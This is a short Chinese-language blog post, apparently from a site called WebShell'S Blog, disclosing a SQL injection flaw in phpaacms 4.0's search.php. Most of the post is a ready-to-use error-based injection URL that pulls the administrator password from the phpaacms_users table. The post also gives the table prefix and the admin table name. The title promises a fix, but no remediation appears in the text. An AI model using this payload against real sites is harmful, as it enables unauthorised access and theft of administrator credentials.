phpaacms 4.0 Sql 注入0day漏洞及修复
phpaacms是一套免费开源的简洁文章管理系统cms.
漏洞文件:search.php //变量$_GET['id']过滤不严造成的注射
测试EXP:
https://www.webshell.cc/phpaacms/search.php?id=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20concat(0x7e,0x27,phpaacms_users.password,0x27,0x7e)%20FROM%20`phpaa`.phpaacms_users%20LIMIT%201,1)%20)%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
数据表前缀:
phpaacms_
管理表:
phpaacms_users
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/7.html